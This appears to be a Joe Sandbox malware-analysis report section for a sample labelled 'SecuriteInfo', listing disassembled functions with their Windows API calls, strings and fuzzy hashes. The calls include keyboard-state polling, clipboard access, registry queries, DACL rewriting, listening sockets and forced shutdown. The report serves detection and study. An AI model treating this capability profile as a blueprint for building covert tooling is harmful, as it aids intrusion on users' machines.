Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 458c4dc31e962de492323a590d885ab6a078846c8157564ba55a3ed9dea987a9
Instruction ID: 1b887404fc45c5bee3ae93eafee6db06c601693146a5695be04a96b2c905de1a
Opcode Fuzzy Hash: 458c4dc31e962de492323a590d885ab6a078846c8157564ba55a3ed9dea987a9
Instruction Fuzzy Hash: 223118329052597FCF14AB64ECA8FDE73AE9F49360F14427AE810E31A0D730DE44CA55

Uniqueness

Uniqueness Score: -1.00%

Function 009B81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009B874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009B8766
Part of subcall function 009B874A: GetLastError.KERNEL32(?,009B822A,?,?,?), ref: 009B8770
Part of subcall function 009B874A: GetProcessHeap.KERNEL32(00000008,?,?,009B822A,?,?,?), ref: 009B877F
Part of subcall function 009B874A: HeapAlloc.KERNEL32(00000000,?,009B822A,?,?,?), ref: 009B8786
Part of subcall function 009B874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009B879D

Part of subcall function 009B87E7: GetProcessHeap.KERNEL32(00000008,009B8240,00000000,00000000,?,009B8240,?), ref: 009B87F3
Part of subcall function 009B87E7: HeapAlloc.KERNEL32(00000000,?,009B8240,?), ref: 009B87FA
Part of subcall function 009B87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009B8240,?), ref: 009B880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009B825B
_memset.LIBCMT ref: 009B8270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009B828F
GetLengthSid.ADVAPI32(?), ref: 009B82A0
GetAce.ADVAPI32(?,00000000,?), ref: 009B82DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009B82F9
GetLengthSid.ADVAPI32(?), ref: 009B8316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009B8325
HeapAlloc.KERNEL32(00000000), ref: 009B832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 009B834D
CopySid.ADVAPI32(00000000), ref: 009B8354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009B8385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009B83AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 009B83BF

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 79ed16644807b60a7153557d9c5f2b3c805290d25ec540105b12bb2b6dc690bf
Instruction ID: de64104606b58257a6228e9473d62803f5290cb0bb2e120f4fbb81da8e032d07
Opcode Fuzzy Hash: 79ed16644807b60a7153557d9c5f2b3c805290d25ec540105b12bb2b6dc690bf
Instruction Fuzzy Hash: 78616C71904209EBCF00DF90DD99AEEBBBDFF48710F04812AE815AB291DB349A01DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00976843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

NO_AUTO_POSSESS), xrefs: 009B1567
BSR_UNICODE), xrefs: 009B1771
LF), xrefs: 009B16DD
NO_START_OPT), xrefs: 009B1588
UTF), xrefs: 009B1533
ANYCRLF), xrefs: 009B1734
UTF16), xrefs: 009B1508
LIMIT_RECURSION=, xrefs: 009B1635
CRLF), xrefs: 009B16FA
ANY), xrefs: 009B1717
CR), xrefs: 009B16C0
LIMIT_MATCH=, xrefs: 009B15A9
BSR_ANYCRLF), xrefs: 009B1757
UCP), xrefs: 009B1546

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 23af7ea16c04419537541977c2f0be1e83f313b6282cd0ebd16e343baaa0a4ae
Instruction ID: 3431c7353394d3700ae660f450965f9cc853d67f4d8ee5fd307fb77245b78aa1
Opcode Fuzzy Hash: 23af7ea16c04419537541977c2f0be1e83f313b6282cd0ebd16e343baaa0a4ae
Instruction Fuzzy Hash: 90729372E00619DBDB24CF58C9907EEB7B5FF48320F54816AE949EB290DB749D81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009E0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009E10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E0038,?,?), ref: 009E10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E0737

Part of subcall function 00969997: __itow.LIBCMT ref: 009699C2
Part of subcall function 00969997: __swprintf.LIBCMT ref: 00969A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009E07D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009E086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 009E0AAD
RegCloseKey.ADVAPI32(00000000), ref: 009E0ABA

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 91e65f5607f346f7f9360f9b6c829bb7c1cb7e1955f7ad1b59ce98bf3e3cfd2a
Instruction ID: 1e72b5020e740ab8886a387c39ead59d09f738d318c05168cf02effbbb35c8fa
Opcode Fuzzy Hash: 91e65f5607f346f7f9360f9b6c829bb7c1cb7e1955f7ad1b59ce98bf3e3cfd2a
Instruction Fuzzy Hash: 6FE14B31204254AFCB15DF29C895E6ABBE8FFC9714F04896DF48ADB262DA30ED41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009C0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 009C0241
GetAsyncKeyState.USER32(000000A0), ref: 009C02C2
GetKeyState.USER32(000000A0), ref: 009C02DD
GetAsyncKeyState.USER32(000000A1), ref: 009C02F7
GetKeyState.USER32(000000A1), ref: 009C030C
GetAsyncKeyState.USER32(00000011), ref: 009C0324
GetKeyState.USER32(00000011), ref: 009C0336
GetAsyncKeyState.USER32(00000012), ref: 009C034E
GetKeyState.USER32(00000012), ref: 009C0360
GetAsyncKeyState.USER32(0000005B), ref: 009C0378
GetKeyState.USER32(0000005B), ref: 009C038A

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a57ab42638ef31386709082748444bd7516fdfabe0675fc3547a57557e5ffb02
Instruction ID: 0964dbccc1906384c1f5966ceef7156c16d825db361416999258dc2860ac5c89
Opcode Fuzzy Hash: a57ab42638ef31386709082748444bd7516fdfabe0675fc3547a57557e5ffb02
Instruction Fuzzy Hash: B141DB24D087C9EEFF318BA48858BB5BEA87F91340F08409ED5C64A1C2EB955DC4C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 009D86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00969997: __itow.LIBCMT ref: 009699C2
Part of subcall function 00969997: __swprintf.LIBCMT ref: 00969A0C

CoInitialize.OLE32 ref: 009D8718
CoUninitialize.OLE32 ref: 009D8723
CoCreateInstance.OLE32(?,00000000,00000017,009F2BEC,?), ref: 009D8783
IIDFromString.OLE32(?,?), ref: 009D87F6
VariantInit.OLEAUT32(?), ref: 009D8890
VariantClear.OLEAUT32(?), ref: 009D88F1

Strings

Invalid parameter, xrefs: 009D880F
NULL Pointer assignment, xrefs: 009D87C8
Failed to create object, xrefs: 009D878E, 009D8844

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 2e426f68f0f07936dad59dc2db10147953af991cc295d2b14ec690d021e21b5a
Instruction ID: c3f4327c32a1ccb4b95fc1571d98d7b74fe570e89a8302402eb629ae56516323
Opcode Fuzzy Hash: 2e426f68f0f07936dad59dc2db10147953af991cc295d2b14ec690d021e21b5a
Instruction Fuzzy Hash: CC61AD70648301AFC710DF64C988B6BBBE8AF84714F10881EF9959B392DB74ED44DB92

Uniqueness

Uniqueness Score: -1.00%

Function 009D4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 009D447F
EmptyClipboard.USER32 ref: 009D4485
GlobalAlloc.KERNEL32(00000002,?), ref: 009D449A
CloseClipboard.USER32 ref: 009D4539

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: df45457a424fb645d5c91337ac6b2bf05b858a98d670ed5a451d4514aa97c6eb
Instruction ID: 322539c142387f3ce836a4209da074da423493d316be25351808376282e1c91a
Opcode Fuzzy Hash: df45457a424fb645d5c91337ac6b2bf05b858a98d670ed5a451d4514aa97c6eb
Instruction Fuzzy Hash: 6821AE352542149FDB11AF64EC59B6977A8EF84720F14C02BF906DB3B1CB35AD01DB54

Uniqueness

Uniqueness Score: -1.00%

Function 009C3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009648A1,?,?,009637C0,?), ref: 009648CE

Part of subcall function 009C4CD3: GetFileAttributesW.KERNEL32(?,009C3947), ref: 009C4CD4

FindFirstFileW.KERNEL32(?,?), ref: 009C3ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 009C3B87
MoveFileW.KERNEL32(?,?), ref: 009C3B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 009C3BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 009C3BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 009C3BF5

Strings

\*.*, xrefs: 009C3A8A, 009C3A93, 009C3AA8

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 8cb192161ad8de448fcf35a04d90539cede5ed9dd4c86ef710fbc235a1adaa72
Instruction ID: 9dfca004d90caf92dbb721fc82d75fd27377b1333a20866f31826e69da0c50e7
Opcode Fuzzy Hash: 8cb192161ad8de448fcf35a04d90539cede5ed9dd4c86ef710fbc235a1adaa72
Instruction Fuzzy Hash: 59516D31C052489ACF15EBE0CEA2EFDB778AF54304F6481A9E44277191EF216F09CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009CF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00967F41: _memmove.LIBCMT ref: 00967F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 009CF6AB
Sleep.KERNEL32(0000000A), ref: 009CF6DB
_wcscmp.LIBCMT ref: 009CF6EF
_wcscmp.LIBCMT ref: 009CF70A
FindNextFileW.KERNEL32(?,?), ref: 009CF7A8
FindClose.KERNEL32(00000000), ref: 009CF7BE

Strings

*.*, xrefs: 009CF690

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 0704ce7bd8fe4b2c05d4f16e81a42dfe21b2b3364f53d80be358c91236773d5c
Instruction ID: 041b566f77f06b0386c9d577b965280ac315681058cc23cf3e8d6e8449e1ddfd
Opcode Fuzzy Hash: 0704ce7bd8fe4b2c05d4f16e81a42dfe21b2b3364f53d80be358c91236773d5c
Instruction Fuzzy Hash: 5E417D71D0420AABCF15DFA4CCA5FEEBBB9BF45310F14456AE814A62A0DB309E44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00974140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 009A7B0C
VUUU, xrefs: 00974520
VUUU, xrefs: 009744ED
ERCP, xrefs: 0097421F
VUUU, xrefs: 009744DB

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 1f63710aea7761126d43f4f6d643ab591c269ab0b9f230dcaec5ffe9890a090b
Instruction ID: 940263f7f6e080c96548b678daa6280f4cf206b73d4dab8868da68b3b7bf6ba4
Opcode Fuzzy Hash: 1f63710aea7761126d43f4f6d643ab591c269ab0b9f230dcaec5ffe9890a090b
Instruction Fuzzy Hash: 65A2A071E0421ACBDF24CF98C9817AEB7B5BF55314F14C5AAD85AA7281E7349E81CF80

Uniqueness

Uniqueness Score: -1.00%

Function 009758C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00975A05
_memmove.LIBCMT ref: 00975A55
_memmove.LIBCMT ref: 00975ABB

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d69858b66dadd2c0a0836fb1e081f6ff18bad3bb89c03789ccfbf25428f043f6
Instruction ID: 637af1c45fe68590c5c8bdf61e5014edb462a2f71f90ae7303960079efe4afec
Opcode Fuzzy Hash: d69858b66dadd2c0a0836fb1e081f6ff18bad3bb89c03789ccfbf25428f043f6
Instruction Fuzzy Hash: EF127B71A00609DFDF14DFA4DA81AEEB7B9FF88310F118669E40AE7251EB35AD11CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009C545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 009B8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009B8D0D
Part of subcall function 009B8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009B8D3A
Part of subcall function 009B8CC3: GetLastError.KERNEL32 ref: 009B8D47

ExitWindowsEx.USER32(?,00000000), ref: 009C549B

Strings

@, xrefs: 009C548E
, xrefs: 009C5489
SeShutdownPrivilege, xrefs: 009C546B

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 2ecd182faebd48f25c61cdd7cfc8af069f406ea66ae1524db8b95161ef9e775f
Instruction ID: edf97a72095f114b0531fe6a2fed3915e15078fb3fd0c0f4690950450d047cce
Opcode Fuzzy Hash: 2ecd182faebd48f25c61cdd7cfc8af069f406ea66ae1524db8b95161ef9e775f
Instruction Fuzzy Hash: F7014731E59A012BF72C6374DC8AFBB725CEB04353F210429FC06D60E2DA543CC08192

Uniqueness

Uniqueness Score: -1.00%

Function 009D6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009D65EF
WSAGetLastError.WSOCK32(00000000), ref: 009D65FE
bind.WSOCK32(00000000,?,00000010), ref: 009D661A
listen.WSOCK32(00000000,00000005), ref: 009D6629
WSAGetLastError.WSOCK32(00000000), ref: 009D6643
closesocket.WSOCK32(00000000,00000000), ref: 009D6657

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 0b44d4fe87cc2b2ffeecf7e199560bade05530f7bba0588a3ea806ab833de4bd
Instruction ID: 939d0e76946519ef3123b39c961d715817cf3e5c9a9ccb97a93e4a99f506e9a8
Opcode Fuzzy Hash: 0b44d4fe87cc2b2ffeecf7e199560bade05530f7bba0588a3ea806ab833de4bd
Instruction Fuzzy Hash: FF21D0312402049FCB00EF68C999B6EB7EDEF88320F14815AF956AB3D1CB34AD00DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00975680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00980FF6: std::exception::exception.LIBCMT ref: 0098102C
Part of subcall function 00980FF6: __CxxThrowException@8.LIBCMT ref: 00981041

_memmove.LIBCMT ref: 009B062F
_memmove.LIBCMT ref: 009B0744
_memmove.LIBCMT ref: 009B07EB

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 496dd6f7a3058383a098c75d2b967111bf826a4da390e2df108ee96eabc7863b
Instruction ID: ebef6589bf8ed83bbe396492b2f3365dfe428f9c217628ece446fbf014b2827f
Opcode Fuzzy Hash: 496dd6f7a3058383a098c75d2b967111bf826a4da390e2df108ee96eabc7863b
Instruction Fuzzy Hash: 2E029EB1A00209DBCF04DF64D981AAEBBB9FF84310F15C069E80ADB355EB35DA55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00961287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00962612: GetWindowLongW.USER32(?,000000EB), ref: 00962623

DefDlgProcW.USER32(?,?,?,?,?), ref: 009619FA
GetSysColor.USER32(0000000F), ref: 00961A4E
SetBkColor.GDI32(?,00000000), ref: 00961A61

Part of subcall function 00961290: DefDlgProcW.USER32(?,00000020,?), ref: 009612D8

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 497cb2612bedc79f02311cd38d5920828871b2392aa118775ee95c238b206bae
Instruction ID: 46d032fbd303c33a0b4aecb7c3467f8d92acc71d19fbcf6d78c55bd567eb99ff
Opcode Fuzzy Hash: 497cb2612bedc79f02311cd38d5920828871b2392aa118775ee95c238b206bae
Instruction Fuzzy Hash: FCA19DB1106584BEEB38ABADAD54E7F359DDF81386B1C091AF442D61E1DE2CCD02D2B1

Uniqueness

Uniqueness Score: -1.00%

Function 009D6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009D80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009D80CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 009D6AB1
WSAGetLastError.WSOCK32(00000000), ref: 009D6ADA
bind.WSOCK32(00000000,?,00000010), ref: 009D6B13
WSAGetLastError.WSOCK32(00000000), ref: 009D6B20
closesocket.WSOCK32(00000000,00000000), ref: 009D6B34

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
